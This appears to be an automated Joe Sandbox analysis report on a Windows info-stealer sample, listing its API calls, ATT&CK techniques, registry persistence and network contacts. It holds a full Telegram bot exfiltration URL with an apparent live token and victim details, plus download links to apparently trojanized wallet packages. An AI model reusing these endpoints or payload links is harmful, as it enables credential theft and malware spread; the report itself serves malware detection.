Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,4_2_00007FF67D713858
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoEx,FormatMessageA,4_2_00007FF67D6FAF50
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,4_2_00007FF67D712F44
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00007FF67D7137A8
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: EnumSystemLocalesW,4_2_00007FF67D7132A0
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF67D71398C
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: EnumSystemLocalesW,4_2_00007FF67D70A4A8
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF67D713408
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: EnumSystemLocalesW,4_2_00007FF67D713370
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9F1DC4 GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_00007FF72C9F1DC4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA0D2C8 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF72CA0D2C8

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Scheduled Task/Job		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		1
OS Credential Dumping		2
System Time Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job		1
Process Injection		1
Obfuscated Files or Information		LSASS Memory1
System Network Connections Discovery		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder		1
Scheduled Task/Job		1
DLL Side-Loading		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive11
Encrypted Channel		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Registry Run Keys / Startup Folder		1
File Deletion		NTDS22
System Information Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script113
Masquerading		LSA Secrets1
Network Share Discovery		SSHKeylogging3
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Virtualization/Sandbox Evasion		Cached Domain Credentials1
Query Registry		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Process Injection		DCSync31
Security Software Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
Virtualization/Sandbox Evasion		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
Process Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
System Network Configuration Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe63%ReversingLabsWin32.Ransomware.Generic
file.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files\Windows Media Player\graph\graph.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://drive-preprod.corp.g0%Avira URL Cloudsafe
https://drive-daily-1.corp.google.com0%Avira URL Cloudsafe
https://chrome.goo0%Avira URL Cloudsafe
https://chrome.g0%Avira URL Cloudsafe
http://microsoft.co0%Avira URL Cloudsafe
https://drive-preprod.corp.gH0%Avira URL Cloudsafe
https://drive-daily-2.corp.google.co0%Avira URL Cloudsafe
https://drive.google.co0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ipinfo.io
34.117.59.81
truefalse
    		high
    drive.google.com
    		216.58.208.238
    		truefalse
      		high
      drive.usercontent.google.com
      		172.217.17.65
      		truefalse
        		high
        api.telegram.org
        		149.154.167.220
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://ipinfo.io/jsonfalse
            		high
            https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20648351%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTMLfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://ipinfo.io/missingauthjson[1].json.2.dr, json[1].json.0.drfalse
                		high
                https://payments.google.com/payments/v4/js/integrator.jsF6B34A4rmifile.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://api.telegram.org/ffile.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://ipinfo.io/jsonUUfile.exe, 00000000.00000003.2280624154.000001E4276A9000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://api.telegram.org/botfile.exefalse
                        		high
                        https://chrome.google.com/webstore$file.exe, 00000000.00000003.2175064933.000001E427676000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174902630.000001E427674000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://drive.google.com/uc?id=URL:file.exefalse
                            		high
                            https://api.telegram.org/rfile.exe, 00000002.00000002.2326412111.00000207054F7000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://chrome.goofile.exe, 00000000.00000003.2173694588.000001E427643000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172934833.000001E427642000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ipinfo.io/jsonN/Aipcountryfile.exefalse
                                		high
                                https://payments.google.com/file.exe, 00000002.00000003.2183315394.00000207054BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183385984.00000207054B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183348068.00000207054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.microfile.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://sandbox.google.com/payments/v4/js/integrator.jsfile.exe, 00000000.00000003.2173694588.000001E427643000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172934833.000001E427642000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?downfile.exefalse
                                        		high
                                        https://drive-preprod.corp.gHfile.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285253534.000002070549B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.telegram.org/botFailedfile.exefalse
                                          		high
                                          https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zipfile.exefalse
                                            		high
                                            https://www.google.com/=B~file.exe, 00000002.00000003.2183099205.00000207054B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183071483.0000020705494000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183315394.00000207054BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://docs.google.com/file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://drive-staging.corp.google.com/file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ipinfo.io/ofile.exe, 00000002.00000002.2326755680.0000020705E20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.google.com/file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.telegram.org/file.exe, 00000002.00000002.2326412111.00000207054F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive-daily-2.corp.google.cofile.exe, 00000000.00000002.2302541318.000001E42763D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://drive-preprod.corp.gfile.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285253534.000002070549B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ipinfo.io/jsonoUfile.exe, 00000000.00000003.2280624154.000001E4276A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.com/hjaifile.exe, 00000000.00000003.2172989536.000001E427674000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175064933.000001E427676000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174902630.000001E427674000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172803550.000001E42765E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://payments.google.com/payments/v4/js/integrator.js16FBB22_tyfile.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ipinfo.io/jsongUfile.exe, 00000000.00000003.2280624154.000001E4276A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://chrome.google.com/webstorevfile.exe, 00000002.00000003.2183250126.000002070549B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183222413.0000020705493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183071483.0000020705494000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://drive-daily-1.corp.google.comfile.exe, 00000000.00000003.2173694588.000001E427643000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2302541318.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174782172.000001E427645000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172934833.000001E427642000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174933443.000001E427645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?downfile.exefalse
                                                                    		high
                                                                    https://chrome.google.com/webstoresfile.exe, 00000002.00000003.2183250126.000002070549B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183222413.0000020705493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183071483.0000020705494000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ipinfo.io/cfile.exe, 00000002.00000002.2326755680.0000020705E20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://payments.google.com/payments/v4/js/integrator.jsFfile.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ipinfo.io/json_Ufile.exe, 00000000.00000003.2280624154.000001E4276A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://sandbox.google.com/payments/v4/js/integrator.js56D1DC42estfile.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.google.com/_Cfile.exe, 00000002.00000003.2183099205.00000207054B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183071483.0000020705494000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ipinfo.io/1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5ffile.exe, 00000000.00000002.2302541318.000001E4275F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?dfile.exefalse
                                                                                    		high
                                                                                    http://microsoft.cofile.exe, 00000000.00000002.2302798915.000001E429270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204001116.000001E429277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285423182.0000020705E28000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326755680.0000020705E20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://chrome.google.com/webstorefile.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://drive-daily-2.corp.google.com/file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://drive-autopush.corp.google.com/file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://payments.google.com/payments/v4/js/integrator.jsfile.exe, 00000000.00000003.2173694588.000001E427643000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172934833.000001E427642000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://drive-daily-4.corp.google.com/file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183207852.0000020705476000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://chrome.google.com/webstorehfile.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://sandbox.google.com/payments/v4/js/integrator.js4EEE6F7Frrofile.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://drive.usercontent.google.com/file.exe, 00000002.00000003.2285357807.0000020705523000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://drive.google.com/uc?id=file.exefalse
                                                                                                      		high
                                                                                                      https://www.google.com/Dfile.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://drive-daily-1.corp.google.com/file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://payments.google.com/payments/v4/js/integrator.js77ED382file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://chrome.gfile.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://drive-daily-5.corp.google.com/file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270file.exe, 00000002.00000002.2326412111.0000020705523000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.0000020705518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://chrome.google.com/webstofile.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://drive.usercontent.google.com/Ifile.exe, 00000002.00000002.2326412111.0000020705523000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285357807.0000020705523000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?dfile.exefalse
                                                                                                                      		high
                                                                                                                      https://ipinfo.io/file.exe, 00000000.00000002.2302541318.000001E427663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://drive-daily-6.corp.google.com/file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://drive-daily-0.corp.google.com/file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://sandbox.google.com/payments/v4/js/integrator.js~file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://sandbox.google.com/payments/v4/js/integrator.jsCCDD9E26file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://drive-preprod.corp.google.com/file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.google.com/om/file.exe, 00000000.00000003.2174782172.000001E42764A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172846719.000001E427647000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://sandbox.google.com/file.exe, 00000002.00000003.2183315394.00000207054BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183385984.00000207054B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183348068.00000207054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://ipinfo.io/jsonhzfile.exe, 00000002.00000002.2326412111.00000207054F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.google.com/file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://drive.google.cofile.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://drive-daily-3.corp.google.com/file.exe, 00000002.00000003.2285253534.000002070549B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high

                                                                                                                                            World Map of Contacted IPs

                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs

                                                                                                                                            Public IPs

                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            149.154.167.220
                                                                                                                                            		api.telegram.orgUnited Kingdom
                                                                                                                                            		62041TELEGRAMRUfalse
                                                                                                                                            34.117.59.81
                                                                                                                                            		ipinfo.ioUnited States
                                                                                                                                            		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                            172.217.17.65
                                                                                                                                            		drive.usercontent.google.comUnited States
                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                            216.58.208.238
                                                                                                                                            		drive.google.comUnited States
                                                                                                                                            		15169GOOGLEUSfalse

                                                                                                                                            General Information

                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                            Analysis ID:1573853
                                                                                                                                            Start date and time:2024-12-12 17:00:06 +01:00
                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 7m 27s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                            Run name:Run with higher sleep bypass
                                                                                                                                            Number of analysed new started processes analysed:9
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Sample name:file.exe
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal80.troj.spyw.winEXE@8/9@4/4
                                                                                                                                            EGA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            • Number of executed functions: 72
                                                                                                                                            • Number of non-executed functions: 133
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                            Warnings

                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                            • VT rate limit hit for: file.exe

                                                                                                                                            Simulations

                                                                                                                                            Behavior and APIs

                                                                                                                                            TimeTypeDescription
                                                                                                                                            17:01:08Task SchedulerRun new task: MyBootTask path: C:\Users\user\Desktop\file.exe
                                                                                                                                            17:01:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                            17:01:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe

                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                            IPs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            149.154.167.220file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                fWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
                                                                                                                                                  Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
